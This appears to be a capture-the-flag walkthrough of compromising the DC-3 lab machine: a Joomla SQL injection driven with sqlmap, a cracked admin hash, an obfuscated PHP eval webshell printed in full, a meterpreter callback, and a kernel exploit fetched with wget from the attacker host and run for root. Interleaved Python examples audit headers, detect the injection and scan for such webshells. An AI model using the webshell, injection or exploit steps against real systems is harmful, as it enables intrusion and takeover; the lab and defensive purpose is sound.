DC-3

admin  2024-01-06 13:10:36

Preface

First of all, remember that any unauthorised penetration is illegal, so do not go hacking at random or you will end up behind bars with plenty to cry about. Practice on locally built targets instead, such as DVWA.

Lab overview

Target: 172.16.10.31

Attack machines: 172.16.10.13; 172.16.10.26

I. Information gathering

1. Host discovery


2. Port scan


3. Service version scan


II. Exploitation

1. Visit the web site


The home page tells us the machine has only one flag, and that getting it requires root privileges:

This time, there is only one flag, one entry point and no clues.

To get the flag, you'll obviously have to gain root privileges.

How you get to be root is up to you - and, obviously, the system.

Good luck - and I hope you enjoy this little challenge.

2. Identify the web framework


3. Nikto scan

Scan the site with nikto to see which vulnerabilities or files it reports:

└─# nikto -h 172.16.10.31
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          172.16.10.31
+ Target Hostname:    172.16.10.31
+ Target Port:        80
+ Start Time:         2024-01-02 20:19:35 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2047
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8910 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time:           2024-01-02 20:19:55 (GMT8) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Report results (the same scan exported with -Format html -o nikto_report.html)

Target: 172.16.10.31 (hostname 172.16.10.31), port 80
HTTP Server: Apache/2.4.18 (Ubuntu)
Site Link (Name / IP): http://172.16.10.31:80/

Findings (URI, HTTP method, description, reference):

- / GET: The anti-clickjacking X-Frame-Options header is not present. (X-Frame-Options - HTTP | MDN)
- / GET: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. (Missing Content-Type Header Detected on Web Application | Invicti)
- /images GET: IP address found in the 'location' header. The IP is "127.0.1.1". (Private IP addresses disclosed - PortSwigger)
- /images GET: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". (CVE-2000-0649)
- / HEAD: Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
- / ULIJVHGE: Web Server returns a valid response with junk HTTP methods which may cause false positives.
- / DEBUG: DEBUG HTTP verb may show server debugging information. (Enable debugging for ASP.NET apps - Visual Studio | Microsoft Learn)
- /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc GET: EW FileManager for PostNuke allows arbitrary file retrieval. (CVE-2004-2047)
- /administrator/ GET: This might be interesting.
- /bin/ GET: This might be interesting.
- /includes/ GET: This might be interesting.
- /tmp/ GET: This might be interesting.
- /LICENSE.txt GET: License file found may identify site software.
- /icons/README GET: Apache default file found. (https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/)
- /htaccess.txt GET: Default Joomla! htaccess.txt file found. This should be removed or renamed.
- /administrator/index.php GET: Admin login page/section found.

Host Summary: Start Time 2024-01-02 20:45:40, End Time 2024-01-02 20:46:00, Elapsed Time 20 seconds; Statistics 8910 requests, 0 errors, 16 findings
Scan Summary: Nikto 2.5.0; CLI Options -h 172.16.10.31 -Format html -o nikto_report.html; Hosts Tested 1; Start Time Tue Jan 2 20:45:40 2024, End Time Tue Jan 2 20:46:00 2024, Elapsed Time 20 seconds
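Most of what nikto reported above is configuration hygiene rather than an exploitable bug: two missing browser-hardening headers, a version-bearing Server banner, and a Location header that leaks the loopback address 127.0.1.1. The following Python is an added example (not from the original post or from nikto) of how a defender can re-check those four points from captured response headers; the header dictionaries are constructed to mirror the DC-3 findings, and the allow-listed header values and the "hardened" sample are this example's own assumptions.

```python
import re
from ipaddress import ip_address

# Hardening headers nikto reported missing on DC-3, with the values a
# defender expects to see. (The allow-list is this example's own choice.)
REQUIRED_HEADERS = {
    "X-Frame-Options": ("DENY", "SAMEORIGIN"),
    "X-Content-Type-Options": ("nosniff",),
}

# "Apache/2.4.18 (Ubuntu)" discloses a version; a bare "Apache" does not.
SERVER_VERSION_RE = re.compile(r"^[A-Za-z-]+/\d+(?:\.\d+)+")
LOCATION_HOST_RE = re.compile(r"^https?://([^/:]+)")


def is_internal(host):
    """True for loopback or RFC 1918 literals such as the 127.0.1.1 nikto saw."""
    try:
        ip = ip_address(host)
    except ValueError:          # a hostname, not an IP literal
        return False
    return ip.is_loopback or ip.is_private


def audit_response(headers, request_path="/"):
    """Return a list of finding strings for one response's headers.

    headers: dict of header name -> value; names are matched case-insensitively.
    """
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    for name, good in REQUIRED_HEADERS.items():
        value = h.get(name.lower())
        if value is None:
            findings.append("%s: missing %s (expected one of %s)"
                            % (request_path, name, ", ".join(good)))
        elif value.strip().upper() not in {g.upper() for g in good}:
            findings.append("%s: unexpected %s value %r" % (request_path, name, value))

    server = h.get("server", "")
    if SERVER_VERSION_RE.match(server):
        findings.append("%s: Server banner discloses version: %r" % (request_path, server))

    m = LOCATION_HOST_RE.match(h.get("location", ""))
    if m and is_internal(m.group(1)):
        findings.append("%s: Location header leaks internal address %s"
                        % (request_path, m.group(1)))
    return findings


# Constructed sample headers modelled on the nikto findings for DC-3.
DC3_ROOT_HEADERS = {"Server": "Apache/2.4.18 (Ubuntu)", "Content-Type": "text/html"}
DC3_IMAGES_HEADERS = {"Server": "Apache/2.4.18 (Ubuntu)",
                      "Location": "http://127.0.1.1/images/"}
# What the same server should send after hardening (ServerTokens Prod plus
# the two headers added in the Apache config); assumed, not observed.
HARDENED_HEADERS = {"Server": "Apache", "X-Frame-Options": "SAMEORIGIN",
                    "X-Content-Type-Options": "nosniff", "Content-Type": "text/html"}

if __name__ == "__main__":
    for path, hdrs in (("/", DC3_ROOT_HEADERS), ("/images", DC3_IMAGES_HEADERS),
                       ("/ (hardened)", HARDENED_HEADERS)):
        print(path, audit_response(hdrs, path) or ["no findings"])
```

The loopback leak is checked on the redirect target rather than the page body, which is where nikto saw it: Apache built the Location URL from its own ServerName (127.0.1.1) when it redirected /images to /images/.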


The scan shows the site runs on Joomla. With the framework known, check whether this version is affected by a known vulnerability, CVE-2017-8917:

└─# searchsploit joomla | grep 3.7
Joomla! 1.5.x - 404 Error Page Cross-Site Scripting | php/webapps/33378.txt
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit) | php/remote/38797.rb
Joomla! 3.7 - SQL Injection | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component actualite 1.0 - 'id' SQL Injection | php/webapps/5337.txt
Joomla! Component ARI Quiz 3.7.4 - SQL Injection | php/webapps/46769.txt
Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection | php/webapps/42387.txt
Joomla! Component Cmimarketplace - 'viewit' Directory Traversal | php/webapps/8367.txt
Joomla! Component com_alert - 'q_item' SQL Injection | php/webapps/33771.txt
Joomla! Component com_aml_2 - 'art' SQL Injection | php/webapps/33795.txt
Joomla! Component com_as - 'catid' SQL Injection | php/webapps/33766.txt
Joomla! Component com_cb - 'cat' SQL Injection | php/webapps/33796.txt
Joomla! Component com_cbcontact - 'contact_id' SQL Injection | php/webapps/35745.txt
Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting | php/webapps/33757.txt
Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities | php/webapps/34754.py
Joomla! Component com_informations - SQL Injection | php/webapps/37774.txt
Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities | multiple/webapps/37767.txt
Joomla! Component com_jphoto - 'id' SQL Injection | php/webapps/10367.txt
Joomla! Component com_jresearch - 'Controller' Local File Inclusion | php/webapps/33797.txt
Joomla! Component com_macgallery 1.5 - Arbitrary File Download | php/webapps/34755.py
Joomla! Component com_memorix - SQL Injection | php/webapps/37773.txt
Joomla! Component com_photoblog - Blind SQL Injection | php/webapps/11337.txt
Joomla! Component com_realestatemanager 3.7 - SQL Injection | php/webapps/38445.txt
Joomla! Component com_seek - 'id' SQL Injection | php/webapps/33756.txt
Joomla! Component com_shop - SQL Injection | php/webapps/35797.txt
Joomla! Component com_tax - 'eid' SQL Injection | php/webapps/34708.pl
Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection | php/webapps/13979.txt
Joomla! Component DM Orders - 'id' SQL Injection | php/webapps/33474.txt
Joomla! Component EShop 2.5.1 - 'id' SQL Injection | php/webapps/41387.txt
Joomla! Component HD FLV Player - 'id' SQL Injection | php/webapps/33673.pl
Joomla! Component J2Store < 3.3.7 - SQL Injection | php/webapps/46467.txt
Joomla! Component JE auction 1.6 - 'eid' SQL Injection | php/webapps/41337.txt
Joomla! Component JE Messanger - SQL Injection | php/webapps/41347.txt
Joomla! Component jLike 1.0 - Information Leak | php/webapps/43977.php
Joomla! Component Job - SQL Injection | php/webapps/11307.txt
Joomla! Component Jobads - 'type' SQL Injection | php/webapps/33478.txt
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection | php/webapps/44117.txt
Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection | php/webapps/42347.txt
Joomla! Component JSP Tickets 1.1 - SQL Injection | php/webapps/43978.txt
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download | php/webapps/43913.txt
Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection | php/webapps/38777.txt
Joomla! Component Map Locator - 'cid' SQL Injection | php/webapps/35788.txt
Joomla! Component OrgChart 1.0.0 - Local File Inclusion | php/webapps/12317.txt
Joomla! Component ProofReader 1.0 RC9 - Cross-Site Scripting | php/webapps/33377.txt
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection | php/webapps/42589.txt
Joomla! Component Rapid-Recipe - Persistent Cross-Site Scripting | php/webapps/14327.txt
Joomla! Component RSfiles 1.0.2 - 'path' File Download | php/webapps/4307.txt
Joomla! Component Soccer Bet 4.1.5 - 'cat' SQL Injection | php/webapps/41327.txt
Joomla! Component Sponsor Wall 1.1 - SQL Injection | php/webapps/15367.txt
Joomla! Component User Bench 1.0 - 'userid' SQL Injection | php/webapps/43357.txt
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion | php/webapps/31708.txt
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection | php/webapps/43974.txt
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection | php/webapps/43976.txt
Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection | php/webapps/43975.html

There is an SQL injection vulnerability. Opening the entry for details shows that the injection can be driven with sqlmap:

Using Sqlmap: sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
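The parameter sqlmap is pointed at, list[fullordering], ends up in an ORDER BY clause, and an ORDER BY cannot be protected with a bound parameter; the only safe handling is to accept the value solely when it is an allow-listed column name plus a direction. The Python below is an added example (not from the original post or from Joomla) that shows that allow-list check beside a log-side detection for the same parameter: the column allow-list, the default ordering and the access-log lines are all constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Columns a fields list may legitimately be ordered by. This allow-list is an
# assumption for the example; a real component derives it from its model.
ALLOWED_ORDER_COLUMNS = {"a.id", "a.title", "a.state", "a.ordering", "a.created_time"}
ORDERING_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_.]*)\s+(ASC|DESC)\s*$", re.IGNORECASE)


def validate_fullordering(value, allowed=ALLOWED_ORDER_COLUMNS):
    """Return (column, direction) when value is an allow-listed 'col ASC|DESC'.

    Anything else (function calls, parentheses, quotes, comments) returns None:
    an ORDER BY clause cannot be parameterised, so an allow-list is the check,
    and it is the check the vulnerable code path skipped.
    """
    m = ORDERING_RE.match(value or "")
    if not m:
        return None
    column, direction = m.group(1), m.group(2).upper()
    if column not in allowed:
        return None
    return column, direction


def build_order_by(fullordering, default=("a.ordering", "ASC")):
    """Build the ORDER BY fragment, falling back to the default on rejection."""
    return "ORDER BY %s %s" % (validate_fullordering(fullordering) or default)


# Detection side: flag access-log requests carrying SQL syntax in
# list[fullordering]. The tells are the error-based function sqlmap used on
# DC-3 (updatexml), its sibling extractvalue, and generic SQL punctuation.
SQLI_TELLS = re.compile(r"updatexml|extractvalue|[()'\"]|--|/\*", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return [(client_ip, fullordering_value)] for each suspicious log line."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes keys and values, so
        # list%5Bfullordering%5D arrives here as list[fullordering].
        params = parse_qs(urlsplit(m.group(1)).query)
        for value in params.get("list[fullordering]", []):
            if SQLI_TELLS.search(value):
                hits.append((line.split()[0], value))
    return hits


# Constructed Apache access-log lines: the probe from the write-up, one
# legitimate sort, and one unrelated request.
SAMPLE_LOG = [
    '172.16.10.13 - - [02/Jan/2024:21:09:45 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 1843',
    '10.0.0.5 - - [02/Jan/2024:21:10:02 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title+DESC HTTP/1.1" 200 9120',
    '10.0.0.5 - - [02/Jan/2024:21:10:03 +0800] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 7040',
]

if __name__ == "__main__":
    print(build_order_by("updatexml"))      # rejected, default ordering used
    print(build_order_by("a.title DESC"))
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print("suspicious list[fullordering] from %s: %s" % (ip, value))
```

The detection deliberately works on the decoded value: sqlmap's later payloads are percent-encoded in the raw log line, so matching before decoding would miss them.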

4. Dump the databases

[21:09:45] [INFO] fetching database names
[21:09:45] [INFO] retrieved: 'information_schema'
[21:09:45] [INFO] retrieved: 'joomladb'
[21:09:45] [INFO] retrieved: 'mysql'
[21:09:45] [INFO] retrieved: 'performance_schema'
[21:09:45] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

5. Enumerate all tables in the joomladb database

Database: joomladb
[76 tables]
+---------------------+
| #__assets           |
| #__associations     |
| #__banner_clients   |
| #__banner_tracks    |
| #__banners          |
| #__bsms_admin       |
| #__bsms_books       |
| #__bsms_comments    |
| #__bsms_locations   |
| #__bsms_mediafiles  |
| #__bsms_message_typ |
| #__bsms_podcast     |
| #__bsms_series      |
| #__bsms_servers     |
| #__bsms_studies     |
| #__bsms_studytopics |
| #__bsms_teachers    |
| #__bsms_templatecod |
| #__bsms_templates   |
| #__bsms_timeset     |
| #__bsms_topics      |
| #__bsms_update      |
| #__categories       |
| #__contact_details  |
| #__content_frontpag |
| #__content_rating   |
| #__content_types    |
| #__content          |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions       |
| #__fields_categorie |
| #__fields_groups    |
| #__fields_values    |
| #__fields           |
| #__finder_filters   |
| #__finder_links_ter |
| #__finder_links     |
| #__finder_taxonomy_ |
| #__finder_taxonomy  |
| #__finder_terms_com |
| #__finder_terms     |
| #__finder_tokens_ag |
| #__finder_tokens    |
| #__finder_types     |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages        |
| #__menu_types       |
| #__menu             |
| #__messages_cfg     |
| #__messages         |
| #__modules_menu     |
| #__modules          |
| #__newsfeeds        |
| #__overrider        |
| #__postinstall_mess |
| #__redirect_links   |
| #__schemas          |
| #__session          |
| #__tags             |
| #__template_styles  |
| #__ucm_base         |
| #__ucm_content      |
| #__ucm_history      |
| #__update_sites_ext |
| #__update_sites     |
| #__updates          |
| #__user_keys        |
| #__user_notes       |
| #__user_profiles    |
| #__user_usergroup_m |
| #__usergroups       |
| #__users            |
| #__utf8_conversion  |
| #__viewlevels       |
+---------------------+

6. Enumerate the columns of the #__users table

Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| name     | non-numeric |
| email    | non-numeric |
| id       | numeric     |
| params   | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+

Read the username and password values:

Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password                                                     |
+----------+--------------------------------------------------------------+
| admin    | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+

The password we obtained is not plaintext but a bcrypt hash (the $2y$10$ prefix), so the next step is to recover the plaintext by cracking it.


The admin password turns out to be: snoopy

7. Log in to the administrator back end

Log in to the back end with the recovered username and password; a successful login looks like this:


8. Getshell

Upload a web shell. A one-line shell would do here; in a heavily monitored environment an encrypted shell is the better choice. Rather than uploading a file, we create the shell file directly on the server:


@error_reporting(0);
function Decrypt($data){
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
    $after=$bs($data."");
    for($i=0;$i
        $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>
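The shell above has a recognisable shape: errors silenced, a function name assembled from string fragments so that "base64_decode" never appears literally, the raw request body read from php://input, an XOR pass over it, and finally eval of a variable. A defender hunting for files like this under a web root can score those traits. The Python below is an added example, not from the original post or from any scanner product: the rules, weights, threshold and the three sample PHP files it writes into a temporary web root are all constructed for the example.

```python
import os
import re
import tempfile

# Each rule: (name, regex, weight). Weights and the threshold are this
# example's own choice; they are tuned to the traits of the shell above.
RULES = [
    ("eval-of-variable",    re.compile(r"\beval\s*\(\s*\$\w+\s*\)"), 3),
    ("reads-php-input",     re.compile(r"file_get_contents\s*\(\s*['\"]php://input['\"]"), 3),
    ("split-function-name", re.compile(r"['\"][a-z0-9_]+['\"]\s*\.\s*['\"][a-z0-9_]+['\"]\s*;"), 2),
    ("variable-function",   re.compile(r"\$\w+\s*\("), 1),
    ("xor-decode",          re.compile(r"\^\s*\$\w+\s*\["), 2),
    ("errors-silenced",     re.compile(r"error_reporting\s*\(\s*0\s*\)"), 1),
]
THRESHOLD = 5   # two strong tells, or one strong tell plus several weak ones


def score_source(src):
    """Return (score, [names of rules that matched]) for one PHP source text."""
    hits = [name for name, rx, _ in RULES if rx.search(src)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits


def scan_tree(root):
    """Walk a web root; return {relative path: (score, hits)} for files at or over THRESHOLD."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith((".php", ".phtml")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                score, hits = score_source(fh.read())
            if score >= THRESHOLD:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = (score, hits)
    return findings


# Constructed samples: one with the same tells as the shell in the write-up,
# one ordinary template helper, one sloppy-but-harmless file.
SUSPECT_PHP = """<?php
@error_reporting(0);
$bs = "base64_" . "decode";
$after = $bs(file_get_contents("php://input"));
$after[0] = $after[0] ^ $key[1];
eval($after);
"""
BENIGN_PHP = """<?php
// ordinary template helper
$title = htmlspecialchars($_GET['t'] ?? 'home');
echo "<h1>$title</h1>";
"""
NOISY_PHP = """<?php
error_reporting(0);   // sloppy, but not a shell on its own
echo date('Y');
"""


def demo():
    """Write the samples into a temporary web root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        tpl = os.path.join(root, "templates", "beez3")
        os.makedirs(tpl)
        for name, body in (("helper.php", BENIGN_PHP), ("shell.php", SUSPECT_PHP),
                           ("legacy.php", NOISY_PHP)):
            with open(os.path.join(tpl, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, (score, hits) in demo().items():
        print("%s score=%d hits=%s" % (path, score, ",".join(hits)))
```

Scoring rather than single-pattern matching is what keeps the noise down: error_reporting(0) alone is common in legacy code and scores 1, while the combination of reading php://input and eval of a variable scores 6 on its own.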

Connect to the web shell


Open a virtual terminal


III. Privilege escalation

First get a session back to msf; use whatever method you prefer, a bash reverse shell also works. Since msf makes the escalation step easier, that is what we use here.


A successful callback looks like this:


Start the escalation

meterpreter > shell
Process 1752 created.
Channel 0 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/var/www/html/templates/beez3$
www-data@DC-3:/var/www/html/templates/beez3$ whoami
whoami
www-data
www-data@DC-3:/var/www/html/templates/beez3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We are still running as www-data, so we need a way to become root. Two methods are shown here.

Method 1

Get the kernel version of the operating system


Get the distribution release information


The system is Ubuntu 16.04, so search searchsploit for matching exploits


Filter out the irrelevant results using the information collected above


If you are not sure which one to use, try them one at a time; the following exploit turned out to escalate to root successfully:

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation               | linux/local/39772.txt
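The exploit picked here depends on two things besides the kernel release: the bpf() syscall has to be compiled in (CONFIG_BPF_SYSCALL) and unprivileged use of it must not be switched off (kernel.unprivileged_bpf_disabled must not be 1); the helper script in Method 2 below prints exactly those conditions next to CVE-2016-4557. The Python below is an added example (not from the original post, linux-exploit-suggester or exploit-db) that turns those conditions into a defender-side check a fleet can be audited with. The DC-3 inputs are constructed from what the write-up reports (kernel 4.4.0 on Ubuntu 16.04, tagged 4.4.0-21-generic), and the fixed release is an assumption passed in by the caller; the default of 4.4.0-22 is a placeholder, not a verified value.

```python
import os
import re

# '4.4.0-21-generic' -> major, minor, patch and the Ubuntu ABI number.
RELEASE_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(\d+))?")


def parse_release(release):
    """'4.4.0-21-generic' -> (4, 4, 0, 21); a missing ABI number counts as 0."""
    m = RELEASE_RE.match(release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x or 0) for x in m.groups())


def assess_bpf_exposure(release, unprivileged_bpf_disabled, config_lines,
                        fixed_release="4.4.0-22"):
    """Classify a host against the three preconditions for CVE-2016-4557.

    config_lines: lines of /boot/config-<release>, or None when unreadable.
    fixed_release: assumed first fixed kernel (caller's responsibility).
    Returns (verdict, reasons); verdict is one of
    'not exposed', 'mitigated', 'patched', 'exposed'.
    """
    if config_lines is not None and "CONFIG_BPF_SYSCALL=y" not in config_lines:
        return "not exposed", ["CONFIG_BPF_SYSCALL not set: bpf() syscall unavailable"]
    older_than_fix = parse_release(release) < parse_release(fixed_release)
    # 1 disables unprivileged bpf() until reboot; 2 (newer kernels) also
    # disables it but may be set back to 0 by root.
    if unprivileged_bpf_disabled >= 1:
        return "mitigated", ["kernel.unprivileged_bpf_disabled=%d blocks bpf() for "
                             "unprivileged users such as www-data" % unprivileged_bpf_disabled]
    if older_than_fix:
        return "exposed", ["kernel %s predates assumed fixed release %s" % (release, fixed_release),
                           "kernel.unprivileged_bpf_disabled=0"]
    return "patched", ["kernel %s is at or after assumed fixed release %s"
                       % (release, fixed_release)]


def read_live_host():
    """Collect the same three inputs from the running Linux host (best effort)."""
    release = os.uname().release
    try:
        with open("/proc/sys/kernel/unprivileged_bpf_disabled") as fh:
            sysctl = int(fh.read().strip())
    except OSError:
        sysctl = 0               # sysctl absent: nothing is restricting bpf()
    try:
        with open("/boot/config-" + release) as fh:
            config = [line.strip() for line in fh]
    except OSError:
        config = None            # unreadable: leave the CONFIG check undecided
    return release, sysctl, config


# Constructed inputs mirroring what the write-up found on DC-3.
DC3_RELEASE = "4.4.0-21-generic"
DC3_CONFIG = ["CONFIG_BPF=y", "CONFIG_BPF_SYSCALL=y"]

if __name__ == "__main__":
    print(assess_bpf_exposure(DC3_RELEASE, 0, DC3_CONFIG))   # DC-3 as found
    print(assess_bpf_exposure(DC3_RELEASE, 1, DC3_CONFIG))   # same box after sysctl -w
    try:
        print(assess_bpf_exposure(*read_live_host()))
    except (ValueError, AttributeError) as exc:                # non-Linux host
        print("live check skipped:", exc)
```

The second verdict is the cheap mitigation when patching is delayed: setting kernel.unprivileged_bpf_disabled=1 removes the syscall from www-data's reach, which is why the helper script lists that sysctl as a precondition rather than only the kernel version.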

1. Download the exploit

 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

2. Upload the exploit

Upload the downloaded exploit to the target. Here we simply start a web server on the attack machine and use wget on the target to fetch the exploit from it.


Unzip 39772.zip, then extract the exploit tarball inside it; once that is done, run the commands below.

www-data@DC-3:/var/www/html/templates/beez3$ wget http://172.16.10.13:8081/39772.zip
--2024-01-04 13:41:07--  http://172.16.10.13:8081/39772.zip
Connecting to 172.16.10.13:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

39772.zip           100%[===================>]   6.86K  --.-KB/s    in 0s

2024-01-04 13:41:07 (883 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC-3:/var/www/html/templates/beez3$ mv 39772.zip /tmp
mv 39772.zip /tmp
www-data@DC-3:/var/www/html/templates/beez3$ cd /tmp
cd /tmp
www-data@DC-3:/tmp$ ls
ls
39772.zip
systemd-private-243bd71fbb09439dab71dc9493bf7f2f-systemd-timesyncd.service-jwvQND
vmware-root
www-data@DC-3:/tmp$ unzip 39772.zip
unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store
  inflating: 39772/crasher.tar
  inflating: __MACOSX/39772/._crasher.tar
  inflating: 39772/exploit.tar
  inflating: __MACOSX/39772/._exploit.tar
www-data@DC-3:/tmp$ ls
ls
39772
39772.zip
__MACOSX
systemd-private-243bd71fbb09439dab71dc9493bf7f2f-systemd-timesyncd.service-jwvQND
vmware-root
www-data@DC-3:/tmp$ cd 39772
cd 39772
www-data@DC-3:/tmp/39772$ ls
ls
crasher.tar  exploit.tar
www-data@DC-3:/tmp/39772$ tar -xzvf exploit.tar
tar -xzvf exploit.tar

gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
www-data@DC-3:/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC-3:/tmp/39772$ cd ebpf_mapfd_doubleput_exploit/
cd ebpf_mapfd_doubleput_exploit/
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x compile.sh
chmod +x compile.sh
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
               ^
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ chmod +x doubleput
chmod +x doubleput
www-data@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/tmp/39772/ebpf_mapfd_doubleput_exploit#

Running id confirms we now have root. Go to the root directory and find the flag.


Method 2

Use a helper script: upload the helper script from the attack machine to the victim server.

www-data@DC-3:/tmp$ wget http://172.16.10.13:8081/dajun.sh
wget http://172.16.10.13:8081/dajun.sh
--2024-01-04 14:18:42--  http://172.16.10.13:8081/dajun.sh
Connecting to 172.16.10.13:8081... connected.
HTTP request sent, awaiting response... 200 OK
Length: 90934 (89K) [text/x-sh]
Saving to: 'dajun.sh'

dajun.sh            100%[===================>]  88.80K  --.-KB/s    in 0.005s

2024-01-04 14:18:42 (16.6 MB/s) - 'dajun.sh' saved [90934/90934]

Run the script

www-data@DC-3:/tmp$ chmod +x dajun.sh
chmod +x dajun.sh
www-data@DC-3:/tmp$ ./dajun.sh
./dajun.sh

Available information:

Kernel version: 4.4.0
Architecture: i686
Distribution: ubuntu
Distribution version: 16.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS

Searching among:

